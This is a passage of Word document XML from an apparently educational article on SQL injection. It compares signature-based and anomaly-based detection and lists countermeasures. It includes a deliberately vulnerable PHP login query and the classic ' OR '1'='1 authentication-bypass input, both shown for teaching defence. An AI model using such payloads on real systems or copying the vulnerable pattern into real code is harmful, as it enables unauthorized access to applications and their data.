        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Comparing Signature-Based and Anomaly-Based Detection for SQL Injection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3656"/>
        <w:gridCol w:w="3523"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Signature-Based Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Anomaly-Based Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Detection Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Matches known attack patterns (signatures)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Detects deviations from normal behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Detection Accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>High accuracy for known attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Can detect new or unknown attacks (zero-day)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>False Positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Low false positives if signatures are well-defined</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Higher false positives due to behavior deviations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Response Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Fast detection of known attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>May require time to establish normal behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Bypassability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Susceptible to evasion by obfuscation or new attack patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>More resistant to evasion and obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Implementation Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Simple and fast to implement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>More complex, requires baseline data and monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7341" w:rsidTr="00CE7341">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Effective for well-known attack patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341">
            <w:r>
              <w:t>Effective for detecting new, unknown, or modified attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00D543D8" w:rsidP="00CE7341">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hybrid Approach: Combining Signature-Based and Anomaly-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>hybrid approach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is often the best solution to balance the strengths and weaknesses of both detection methods. Combining both techniques allows for better detection coverage, as the signature-based system can quickly catch known attacks, while the anomaly-based system can identify previously unknown attacks or evasion techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Example of Hybrid Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>WAF with Signature + Anomaly Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A Web Application Firewall (WAF) could use a combination of signature-based detection to catch known attack patterns (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>) and anomaly-based detection to spot suspicious request patterns that don't fit normal traffic behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Advantages of Hybrid Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Comprehensive Coverage</w:t>
      </w:r>
      <w:r>
        <w:t>: Detects both known and unknown attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Reduced False Positives</w:t>
      </w:r>
      <w:r>
        <w:t>: Signature-based detection helps reduce the number of false positives from the anomaly-based approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Adaptability</w:t>
      </w:r>
      <w:r>
        <w:t>: Anomaly-based detection can learn and adapt to new attack patterns, while signatures can be updated to cover the latest threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00D543D8" w:rsidP="00CE7341">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Signature-Based Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is best suited for detecting well-known SQL injection attacks and is typically faster and easier to implement. However, it is less effective at </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>detecting new or modified attacks and can be bypassed if attackers obfuscate their payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Anomaly-Based Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provides a more robust method for detecting unknown or zero-day SQL injection attacks by identifying deviations from expected behavior. However, it can have higher false positives and requires more complex configuration and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7341" w:rsidRDefault="00CE7341" w:rsidP="00CE7341">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Hybrid Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (combining both methods) is the most effective strategy, providing a balance of fast, reliable detection of known attacks and adaptive detection of new or obfuscated threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3FE2" w:rsidRPr="009827B6" w:rsidRDefault="00DE3FE2" w:rsidP="00DE3FE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="00D543D8" w:rsidP="002C6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2C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Example of SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:p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A typical SQL Injection vulnerability could look like this:</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php</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$username = $_POST['username'];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$password = $_POST['password'];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$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";</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 xml:space="preserve">$result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysqli_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$connection, $query);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:p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If an attacker enters the following input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C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 xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C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 xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:p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The resulting SQL query would be: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C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="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6C05">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:p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This query will always evaluate to true, allowing the attacker to bypass authentication and gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="00D543D8" w:rsidP="002C6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2C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Summary of Countermeasures</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Prepared Statements/Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The most effective way to prevent SQL injection.</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lastRenderedPageBreak/>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Keep SQL logic within the database and reduce exposure to injection.</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Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Ensure user input matches expected patterns and types.</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Escaping Input</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Escape special characters when dynamic queries are unavoidable.</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Limit Database Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Apply the principle of least privilege.</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Use a Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Add an additional layer of defense.</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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Avoid revealing database errors to end users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Multi-Factor Authentication (MFA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – For critical applications, use MFA to further secure access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6C05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By implementing these practices, developers can significantly reduce the risk of SQL injection and protect both the database and application from malicious attacks.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="002C6C05" w:rsidRPr="002C6C05" w:rsidRDefault="002C6C05" w:rsidP="002C6C05"/>
    <w:sectPr w:rsidR="002C6C05" w:rsidRPr="002C6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E1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD5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E4982"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A268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85537"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2D2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52CA8"/>
